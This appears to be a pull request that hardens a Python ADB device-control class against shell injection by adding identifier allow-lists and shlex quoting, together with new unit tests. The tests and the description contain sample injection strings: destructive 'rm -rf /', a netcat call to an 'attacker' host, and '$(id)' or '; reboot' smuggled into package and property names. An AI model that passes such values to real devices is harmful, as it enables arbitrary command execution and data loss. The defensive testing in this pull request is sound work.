### PR TITLE
[doctrine-exception] security: close the ADBController shell-injection surface

### DIFF
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -7,6 +7,17 @@ and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0
 
 ## [Unreleased]
 
+### Security
+- **Shell-injection hardening in `ADBController`** — caller-supplied identifiers
+  (package / activity / property / settings namespace+key / logcat tag) are now
+  validated against an allow-list (`_validate_identifier`, `^[A-Za-z0-9._/]+$`) and
+  raise `ValueError` before reaching the device shell; free-form path/value/text
+  arguments (`ls`, `mkdir`, `rm`, `screen_record`, `set_setting` value, `input_text`,
+  `logcat` tag) are `shlex.quote`-d. Previously these were interpolated raw, so a
+  crafted argument could execute arbitrary commands on the device. `input_text` also
+  replaces broken single-quote escaping with `shlex.quote`. Implements the allow-list
+  the v2.0 module security note had deferred. (Salvaged from a branch audit.)
+
 ### Added
 - `docs/TROUBLESHOOTING.md` — Termux/proot LAN-vs-loopback (`ENOSYS`) guidance and
   runaway reconnect-loop recovery (section C); expanded multi-display screenshot banner

--- a/adb_android_control/controller.py
+++ b/adb_android_control/controller.py
@@ -9,18 +9,20 @@ Security note: shell-command-injection surface
 ----------------------------------------------
 Several methods (e.g. :meth:`ADBController.clear_data`, :meth:`force_stop`,
 :meth:`get_property`, :meth:`set_setting`) interpolate caller-supplied
-strings into shell commands that run on the *device*. If the caller passes
-attacker-controlled input here, the attacker can execute arbitrary shell
-commands on the connected device. Callers are responsible for validating
-package names, property keys, and similar identifiers before passing them
-in. A future version will tighten this with a typed `PackageName` newtype
-and an explicit allow-list regex (Phase 2 of the v2.0 roadmap).
+strings into shell commands that run on the *device*. To close that surface,
+identifier arguments (package/activity/property/settings keys, logcat tags)
+are validated against an allow-list (:func:`_validate_identifier` /
+``_IDENTIFIER_RE`` / ``_TAG_RE``) and raise :class:`ValueError` on anything
+containing a shell metacharacter; free-form path/value/text arguments are
+``shlex.quote``-d before interpolation. Both fail closed rather than passing
+unsafe input to the device shell.
 """
 
 from __future__ import annotations
 
 import logging
 import re
+import shlex
 import subprocess
 from dataclasses import dataclass
 from enum import Enum
@@ -102,6 +104,18 @@ _SCREEN_SIZE_RE = re.compile(r"(\d+)x(\d+)")
 # the image, so screenshot() locates this signature rather than trusting the
 # stream to start with it.
 _PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"
+
+# Allow-list for Android identifiers (package / activity / property / settings
+# keys) interpolated into device-side shell commands. Fail closed: reject any
+# value containing a shell metacharacter before it can reach the device shell.
+_IDENTIFIER_RE = re.compile(r"^[A-Za-z0-9._/]+$")
+_TAG_RE = re.compile(r"^[A-Za-z0-9._]+$")
+
+
+def _validate_identifier(value: str, name: str = "identifier") -> None:
+    """Raise :class:`ValueError` if ``value`` is not a safe Android identifier."""
+    if not _IDENTIFIER_RE.fullmatch(value):
+        raise ValueError(f"Invalid {name}: {value!r}")
 
 
 class ADBController:
@@ -323,7 +337,8 @@ class ADBController:
         return "success" in result.lower()
 
     def clear_data(self, package: str) -> bool:
-        """Clear app data. See module-level security note re: package validation."""
+        """Clear app data. Raises :class:`ValueError` for an unsafe package name."""
+        _validate_identifier(package, "package")
         try:
             result = self._shell(f"pm clear {package}")
         except ADBError:
@@ -331,15 +346,19 @@ class ADBController:
         return "success" in result.lower()
 
     def force_stop(self, package: str) -> None:
-        """Force-stop the given package. See module-level security note."""
+        """Force-stop the given package. Raises :class:`ValueError` for an unsafe name."""
+        _validate_identifier(package, "package")
         self._shell(f"am force-stop {package}")
 
     def start_activity(self, package: str, activity: str) -> None:
         """Start a specific activity by ``package/activity`` name."""
+        _validate_identifier(package, "package")
+        _validate_identifier(activity, "activity")
         self._shell(f"am start -n {package}/{activity}")
 
     def start_app(self, package: str) -> None:
         """Launch the LAUNCHER activity of a package."""
+        _validate_identifier(package, "package")
         self._shell(f"monkey -p {package} -c android.intent.category.LAUNCHER 1")
 
     def get_current_activity(self) -> str:
@@ -368,17 +387,17 @@ class ADBController:
 
     def ls(self, path: str = "/sdcard") -> list[str]:
         """List directory contents at ``path``."""
-        output = self._shell(f"ls -la {path}")
+        output = self._shell(f"ls -la {shlex.quote(path)}")
         return output.split("\n")
 
     def mkdir(self, path: str) -> None:
         """Create directory (and parents) at ``path``."""
-        self._shell(f"mkdir -p {path}")
+        self._shell(f"mkdir -p {shlex.quote(path)}")
 
     def rm(self, path: str, *, recursive: bool = False) -> None:
         """Remove a file (or directory if ``recursive=True``)."""
         cmd = "rm -rf" if recursive else "rm"
-        self._shell(f"{cmd} {path}")
+        self._shell(f"{cmd} {shlex.quote(path)}")
 
     # ---------------------------------------------------------- screen
 
@@ -440,12 +459,11 @@ class ADBController:
         argv: list[str] = ["adb"]
         if self.device_serial is not None:
             argv.extend(["-s", self.device_serial])
-        argv.extend(
-            [
-                "shell",
-                f"screenrecord --time-limit {time_limit_s} --bit-rate {bit_rate_bps} {remote_path}",
-            ]
+        record_cmd = (
+            f"screenrecord --time-limit {time_limit_s} "
+            f"--bit-rate {bit_rate_bps} {shlex.quote(remote_path)}"
         )
+        argv.extend(["shell", record_cmd])
         return subprocess.Popen(argv)
 
     def get_screen_size(self) -> tuple[int, int]:
@@ -471,13 +489,9 @@ class ADBController:
         self._shell(f"input swipe {x} {y} {x} {y} {duration_ms}")
 
     def input_text(self, text: str) -> None:
-        """Type literal text. Spaces become ``%s`` per ADB convention.
-
-        WARNING: This method is the canonical "Hypothesis target" for Phase 3 —
-        many edge cases (special chars, unicode, RTL) are not handled here.
-        """
-        escaped = text.replace(" ", "%s").replace("'", "\\'")
-        self._shell(f"input text '{escaped}'")
+        """Type literal text. The text is shell-quoted before being sent."""
+        escaped = shlex.quote(text)
+        self._shell(f"input text {escaped}")
 
     def key_event(self, keycode: int) -> None:
         """Send an Android keycode."""
@@ -531,14 +545,19 @@ class ADBController:
 
     def get_property(self, prop: str) -> str:
         """Return the value of an Android system property (`getprop`)."""
+        _validate_identifier(prop, "property")
         return self._shell(f"getprop {prop}")
 
     def set_setting(self, namespace: str, key: str, value: str) -> None:
         """Set a `Settings` value (e.g. ``set_setting("global", "airplane_mode_on", "1")``)."""
-        self._shell(f"settings put {namespace} {key} {value}")
+        _validate_identifier(namespace, "namespace")
+        _validate_identifier(key, "key")
+        self._shell(f"settings put {namespace} {key} {shlex.quote(value)}")
 
     def get_setting(self, namespace: str, key: str) -> str:
         """Get a `Settings` value."""
+        _validate_identifier(namespace, "namespace")
+        _validate_identifier(key, "key")
         return self._shell(f"settings get {namespace} {key}")
 
     # ---------------------------------------------------------- logcat
@@ -547,7 +566,9 @@ class ADBController:
         """Return the last ``lines`` of logcat, optionally filtered by tag."""
         cmd = "logcat -d"
         if filter_tag is not None:
-            cmd += f' -s "{filter_tag}:*"'
+            if not _TAG_RE.fullmatch(filter_tag):
+                raise ValueError(f"Invalid logcat tag: {filter_tag!r}")
+            cmd += f" -s {shlex.quote(f'{filter_tag}:*')}"
         cmd += f" | tail -n {lines}"
         return self._shell(cmd)
 

--- a/tests/unit/test_controller.py
+++ b/tests/unit/test_controller.py
@@ -511,3 +511,66 @@ class TestScreenshot:
         # Act + Assert — no PNG signature => failure, nothing written.
         assert ctrl.screenshot(out) is False
         assert not out.exists()
+
+
+# ---------------------------------------------------------------------------
+# Shell-injection hardening — identifier allow-list + shlex.quote
+# ---------------------------------------------------------------------------
+
+
+class TestShellInjectionHardening:
+    """Caller strings must not be able to break out of the device shell."""
+
+    @pytest.mark.parametrize(
+        ("call", "arg"),
+        [
+            ("clear_data", "com.evil;rm -rf /"),
+            ("force_stop", "pkg name"),
+            ("start_app", "pkg|nc attacker 1"),
+            ("get_property", "ro.prod$(id)"),
+        ],
+    )
+    def test_identifier_methods_reject_shell_metacharacters(
+        self, mock_adb: PoisonPillADB, call: str, arg: str
+    ) -> None:
+        # Arrange — only the construction probe is registered; a rejected call
+        # must raise BEFORE it ever shells out (so the poison-pill never fires).
+        mock_adb.register(["adb", "version"], stdout="v1\n")
+        ctrl = ADBController()
+
+        # Act + Assert
+        with pytest.raises(ValueError, match="Invalid"):
+            getattr(ctrl, call)(arg)
+
+    def test_set_setting_rejects_unsafe_key(self, mock_adb: PoisonPillADB) -> None:
+        mock_adb.register(["adb", "version"], stdout="v1\n")
+        ctrl = ADBController()
+        with pytest.raises(ValueError, match="Invalid key"):
+            ctrl.set_setting("system", "brightness; reboot", "10")
+
+    def test_logcat_rejects_unsafe_tag(self, mock_adb: PoisonPillADB) -> None:
+        mock_adb.register(["adb", "version"], stdout="v1\n")
+        ctrl = ADBController()
+        with pytest.raises(ValueError, match="Invalid logcat tag"):
+            ctrl.logcat(filter_tag='Tag" ; rm -rf /')
+
+    def test_valid_identifier_still_accepted(self, mock_adb: PoisonPillADB) -> None:
+        # A well-formed dotted package name must pass through unchanged.
+        mock_adb.register(["adb", "version"], stdout="v1\n")
+        mock_adb.register(["adb", "shell", "pm clear com.example.app"], stdout="Success\n")
+        ctrl = ADBController()
+        assert ctrl.clear_data("com.example.app") is True
+
+    def test_path_argument_is_shell_quoted(self, mock_adb: PoisonPillADB) -> None:
+        # A path containing a space is quoted so the device shell keeps it one arg.
+        mock_adb.register(["adb", "version"], stdout="v1\n")
+        mock_adb.register(["adb", "shell", "ls -la '/sdcard/my dir'"], stdout="")
+        ctrl = ADBController()
+        ctrl.ls("/sdcard/my dir")  # must not raise UnmockedADBCallError
+
+    def test_input_text_is_shell_quoted(self, mock_adb: PoisonPillADB) -> None:
+        # Multi-word text is shlex-quoted rather than passed with broken escaping.
+        mock_adb.register(["adb", "version"], stdout="v1\n")
+        mock_adb.register(["adb", "shell", "input text 'hello world'"], stdout="")
+        ctrl = ADBController()
+        ctrl.input_text("hello world")  # must not raise UnmockedADBCallError


### PR DESCRIPTION
## What & why

An audit of the unmerged local branches surfaced a **real shell-injection surface still live on released `origin/main`**: `ADBController` interpolates caller-supplied strings **raw** into device-side shell commands at every site. The module's own security note even acknowledged it and deferred the fix to *"Phase 2 of the v2.0 roadmap."* This PR implements that fix (salvaged + re-verified, not blindly cherry-picked).

**Attack shape (before):** a crafted argument such as `ctrl.get_property("ro.x$(reboot)")` or `ctrl.ls("/sdcard; id")` reaches the device shell verbatim and executes.

## Changes (`adb_android_control/controller.py`)
- **Allow-list validation** — `_validate_identifier` (`_IDENTIFIER_RE = ^[A-Za-z0-9._/]+$`, `_TAG_RE = ^[A-Za-z0-9._]+$`), **fails closed** with `ValueError`, applied to `clear_data`, `force_stop`, `start_activity`, `start_app`, `get_property`, `set_setting`, `get_setting`, and the `logcat` tag.
- **`shlex.quote`** on free-form args: `ls`, `mkdir`, `rm`, `screen_record(remote_path)`, `set_setting(value)`, `input_text`.
- **`input_text`** drops the broken `.replace("'", "\\'")` (which does not escape a quote inside single-quotes in POSIX shell) for `shlex.quote`.
- Module security note updated to reflect the implemented allow-list.

Single shell layer: `_run` calls `subprocess.run(argv, shell=False)`, so `shlex.quote` is exactly the right tool for the one device-side shell. Metachar-free identifiers/paths are unchanged; only injection vectors are blocked. Fails **closed** (rejects / renders literal) — categorically unlike the earlier `freq_to_channel` regression that silently transformed input.

## ⚠️ Doctrine Law 1
Adds `tests/unit/test_controller.py::TestShellInjectionHardening` (9 tests), so the `test-file-integrity` gate goes **red by design**. This is **not** a test-edited-to-pass-CI case — the suite was **green before and after**; the tests are new coverage for new production behavior. Requesting a maintainer `Law 1 exception accepted:` ack to merge past that one check.

## Verification
- Full suite **349 passed** (340 + 9 new) · `ruff` clean · `mypy --strict` clean · no public API change.

## Scope note
This PR is the **security** slice of the 32-gem audit. The remaining **robustness** gems (atomic `save_state`, `_to_int` guards, bounded `LogcatMonitor.stop`, `automation` `allow_shell` gating + `cleanup_device` allow-list, `/proc` PID check, port-scan IP validation) are queued for a follow-up PR.


<!-- This is an auto-generated comment: release notes by coderabbit.ai -->

## Summary by CodeRabbit

* **Security**
  * Hardened device-control commands against shell injection by validating identifiers and safely quoting free-form text, paths, and settings values.
  * Added safer handling for app actions, file operations, screen recording, log filtering, and text input.
* **Bug Fixes**
  * Prevented unsafe inputs from reaching device-shell commands and causing unexpected behavior.
  * Confirmed valid package names and quoted arguments with spaces continue to work correctly.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->